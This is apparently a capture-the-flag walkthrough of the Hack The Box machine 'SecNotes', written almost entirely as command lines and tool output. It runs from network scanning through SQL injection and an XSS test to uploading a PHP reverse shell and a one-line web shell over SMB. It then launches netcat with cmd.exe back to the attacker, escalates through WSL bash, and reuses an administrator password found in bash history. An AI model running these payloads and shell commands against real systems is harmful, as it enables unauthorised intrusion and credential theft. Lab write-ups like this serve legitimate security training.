RECON
root@kali:~/htb/secnotes# nmap -sC -sV -p- -vv -oA  full 10.10.10.97
PORT     STATE SERVICE      REASON          VERSION
80/tcp   open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h45m10s, deviation: 4h37m10s, median: 5m09s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25086/tcp): CLEAN (Timeout)
|   Check 2 (port 37549/tcp): CLEAN (Timeout)
|   Check 3 (port 53444/udp): CLEAN (Timeout)
|   Check 4 (port 62684/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2020-11-27T06:53:56-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-27 09:53:55
|_  start_date: N/A

VULN SCAN
root@kali:~/htb/secnotes# nmap -Pn --script vuln 10.10.10.97
PORT    STATE SERVICE
80/tcp  open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.97
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.97:80/
|     Form id: 
|     Form action: /login.php
|     
|     Path: http://10.10.10.97:80/register.php
|     Form id: 
|     Form action: /register.php
|     
|     Path: http://10.10.10.97:80/login.php
|     Form id: 
|_    Form action: /login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /login.php: Possible admin folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED


WEB ENUM
root@kali:~/htb/jerry# nikto -h 10.10.10.97
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.97
+ Target Hostname:    10.10.10.97
+ Target Port:        80
+ Start Time:         2020-11-27 10:40:57 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ Retrieved x-powered-by header: PHP/7.2.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ /login.php: Admin login page/section found.
+ 7499 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-11-27 10:44:13 (GMT-5) (196 seconds)

root@kali:~/htb/secnotes# gobuster -u http://10.10.10.97/ -x "cgi,com,htm,html,log,asp,aspx,jsp,php,pl,txt,conf" -t 40 -s "200,204,301,302,307" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.97/
[+] Threads      : 40
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
[+] Extensions   : .cgi,.com,.htm,.html,.log,.asp,.aspx,.jsp,.php,.pl,.txt,.conf
=====================================================
/login.php (Status: 200)
/home.php (Status: 302)
/contact.php (Status: 302)
/register.php (Status: 200)
/Home.php (Status: 302)
/Contact.php (Status: 302)
/Login.php (Status: 200)
/logout.php (Status: 302)
/Register.php (Status: 200)
/HOME.php (Status: 302)
/Logout.php (Status: 302)
/CONTACT.php (Status: 302)
/LogIn.php (Status: 200)
/LOGIN.php (Status: 200)
=====================================================


CREATE ACCOUNT ON SECNOTES
http://10.10.10.97/register.php
user
hackor

LOGIN TO SECNOTES
http://10.10.10.97/login.php

REVIEW SECNOTES SITE
http://10.10.10.97/home.php
Due to GDPR, all users must delete any notes that contain Personally Identifable Information (PII)
Please contact tyler@secnotes.htb using the contact link below with any questions. 

CREATE NOTE WITH JAVASCRIPT IN TITLE
Title:<script>alert("0")</script>
Note:ab


http://10.10.10.97/home.php?action=delete&id=14%22

CREATE USER USING SQL INJECTION
admin' OR 1=1;-- -
hackor

GET ACCESS TO ALL NOTES
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

ADD SECNOTES TO HOSTS FILE
root@kali:~/htb/secnotes# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
10.10.10.97	secnotes.htb
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

LIST SMB DIRECTORIES FOR SECNOTES
root@kali:~/htb/secnotes# smbclient -L \\\\secnotes.htb\\new-site -U tyler
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\tyler's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	new-site        Disk      
Reconnecting with SMB1 for workgroup listing.
Connection to secnotes.htb failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

CONNECT TO NEW-SITE
root@kali:~/htb/secnotes# smbclient \\\\secnotes.htb\\new-site -U tyler
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\tyler's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Aug 19 14:06:14 2018
  ..                                  D        0  Sun Aug 19 14:06:14 2018
  iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 11:26:03 2018

		12978687 blocks of size 4096. 8114876 blocks available
smb: \> pwd
Current directory is \\secnotes.htb\new-site\


CONNECT TO SMB USING TYLER CREDENTIALS


DOWNLOAD WINDOWS PHP REVERSE SHELL
root@kali:~/htb/secnotes# wget https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/php_reverse_shell.php
root@kali:~/htb/secnotes# cp php_reverse_shell.php.1 rsh.php

ADD LISTENER IP AND PORT
root@kali:~/htb/secnotes# vim rsh.php 

UPLOAD WINDOWS PHP SHELL TO NEW SITE DIRECTORY
root@kali:~/htb/secnotes# smbclient \\\\secnotes.htb\\new-site -U tyler
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\tyler's password: 
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\secnotes.htb\new-site\
smb: \> ls
  .                                   D        0  Fri Nov 27 21:13:55 2020
  ..                                  D        0  Fri Nov 27 21:13:55 2020
  iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 11:26:03 2018

		12978687 blocks of size 4096. 8112771 blocks available
smb: \> put rsh.php
putting file rsh.php as \rsh.php (119.2 kb/s) (average 119.2 kb/s)

TRIGGER REVERSE SHELL
http://10.10.10.97:8808/rsh.php

GET LOW PRIV REVERSE SHELL
nc64 available here https://eternallybored.org/misc/netcat/

root@kali:~/htb/secnotes# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.8] from secnotes.htb [10.10.10.97] 49719
SOCKET: Shell has connected! PID: 4132
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>whoami
iis apppool\newsite

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

GET SYSTEMINFO
root@kali:~/htb/secnotes# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.8] from secnotes.htb [10.10.10.97] 49721
SOCKET: Shell has connected! PID: 8708
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>systeminfo

Host Name:                 SECNOTES
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          wayne
Registered Organization:   
Product ID:                00329-10280-00000-AA051
Original Install Date:     6/21/2018, 1:52:26 PM
System Boot Time:          11/27/2020, 1:18:26 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,228 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,738 MB
Virtual Memory: In Use:    2,061 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4343669
                           [02]: KB4343902
                           [03]: KB4343909
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.97
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

CHECK POTENTIAL EXPLOITS WITH WINDOWS EXPLOIT SUGGESTER
root@kali:~/htb/secnotes# python /root/Windows-Exploit-Suggester/windows-exploit-suggester.py --database /root/Windows-Exploit-Suggester/2020-11-20-mssb.xls --systeminfo /root/htb/secnotes/sysinfo.txt 

CREATE PHP WEB SHELL
root@kali:~/htb/secnotes# vim wsh.php
root@kali:~/htb/secnotes# cat wsh.php 
<?php system($_REQUEST['cmd']); ?>

UPLOAD SHELL DIFFERENT PATH AS SCRIPT KEEPS CLEARING PHP SHELL FILE
root@kali:~/htb/secnotes# smbclient '\\10.10.10.97\new-site' -U 'tyler%92g!mA8BGjOirkL%OG*&' -c 'put wsh.php sh.php'
root@kali:~/htb/secnotes# smbclient '\\10.10.10.97\new-site' -U 'tyler%92g!mA8BGjOirkL%OG*&' -c 'put /usr/share/windows-binaries/nc.exe nc.exe'

TRIGGER REVERSE SHELL
root@kali:~/htb/secnotes# curl 'http://10.10.10.97:8808/sh.php?cmd=nc.exe+10.10.14.8+1234+-e+c:\windows\system32\cmd.exe'

GET LOW PRIV REVERSE SHELL
C:\>root@kali:~/htb/secnotes# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.8] from secnotes.htb [10.10.10.97] 49674
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>whoami
whoami
secnotes\tyler

C:\inetpub\new-site>cd C:\Users\tyler\Desktop    
cd C:\Users\tyler\Desktop

C:\Users\tyler\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\Users\tyler\Desktop

08/19/2018  02:51 PM    <DIR>          .
08/19/2018  02:51 PM    <DIR>          ..
06/22/2018  02:09 AM             1,293 bash.lnk
04/11/2018  03:34 PM             1,142 Command Prompt.lnk
04/11/2018  03:34 PM               407 File Explorer.lnk
06/21/2018  04:50 PM             1,417 Microsoft Edge.lnk
06/21/2018  08:17 AM             1,110 Notepad++.lnk
08/19/2018  08:25 AM                34 user.txt
08/19/2018  09:59 AM             2,494 Windows PowerShell.lnk
               7 File(s)          7,897 bytes
               2 Dir(s)  33,100,058,624 bytes free

C:\Users\tyler\Desktop>type user.txt
type user.txt
###################################

PRIVESC
REVIEW BASH LNK FILE
C:\Users\tyler\Desktop>type bash.lnk
type bash.lnk
Lï¿½F wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Vï¿½	ï¿½v(ï¿½ï¿½ï¿½	ï¿½ï¿½9Pï¿½Oï¿½ ï¿½:iï¿½+00ï¿½/C:\V1ï¿½LIWindows@	ï¾‹Lï¿½ï¿½ï¿½LI.hï¿½ï¿½ï¿½&WindowsZ1ï¿½L<System32B	ï¾‹Lï¿½ï¿½ï¿½L<.pï¿½kï¿½System32Z2ï¿½ï¿½LPï¿½ bash.exeB	ï¾‹L<ï¿½ï¿½LU.ï¿½Yï¿½ï¿½ï¿½ï¿½bash.exeK-JÚºÝœC:\Windows\System32\bash.exe"..\..\..\Windows\System32\bash.exeC:\Windows\System32ï¿½%ï¿½
            ï¿½wNï¿½ï¿½]Nï¿½D.ï¿½ï¿½Qï¿½ï¿½ï¿½`ï¿½Xsecnotesxï¿½<sï¿½AAï¿½ï¿½ã§ï¿½oï¿½:ï¿½uï¿½ï¿½'ï¿½/ï¿½xï¿½<sï¿½AAï¿½ï¿½ã§ï¿½oï¿½:ï¿½uï¿½ï¿½'ï¿½/ï¿½=	ï¿½Y1SPSï¿½0ï¿½ï¿½Cï¿½Gï¿½ï¿½ï¿½ï¿½sf"=dSystem32 (C:\Windows)ï¿½1SPSï¿½ï¿½XFï¿½L8Cï¿½ï¿½ï¿½&ï¿½mï¿½q/S-1-5-21-1791094074-1363918840-4199337083-1002ï¿½1SPS0ï¿½%ï¿½ï¿½Gï¿½ï¿½`ï¿½ï¿½ï¿½ï¿½%
	bash.exe@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
                          ï¿½)
                                Application@v(ï¿½ï¿½ï¿½	ï¿½i1SPSï¿½jc(=ï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½ï¿½MC:\Windows\System32\bash.exe91SPSï¿½mDï¿½ï¿½pHï¿½H@.ï¿½=xï¿½hHï¿½(ï¿½bP
RUN BASH EXECUTABLE
C:\Users\tyler\Desktop>c:\windows\system32\bash.exe
c:\windows\system32\bash.exe
'c:\windows\system32\bash.exe' is not recognized as an internal or external command,
operable program or batch file.

LOCATE BASH EXECUTABLE
C:\Users\tyler\Desktop>where /R c:\ bash.exe
where /R c:\ bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe

RUN BASH EXECUTABLE
C:\Users\tyler\Desktop>c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
mesg: ttyname failed: Inappropriate ioctl for device
id
uid=0(root) gid=0(root) groups=0(root)

UPGRADE THE SHELL
python -c 'import pty;pty.spawn("/bin/bash")'

LIST FILES IN PATH
root@SECNOTES:~# ls -la
ls -la
total 8
drwx------ 1 root root  512 Jun 22  2018 .
drwxr-xr-x 1 root root  512 Jun 21  2018 ..
---------- 1 root root  398 Jun 22  2018 .bash_history
-rw-r--r-- 1 root root 3112 Jun 22  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwxrwxrwx 1 root root  512 Jun 22  2018 filesystem

REVIEW BASH HISTORY
root@SECNOTES:~# cat .bash_history
cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history 
less .bash_history
exit

GET ROOT SHELL USING ADMIN CREDENTIALS
root@kali:~/htb/secnotes# winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
secnotes\administrator

GET ROOT FLAG
C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
##########################

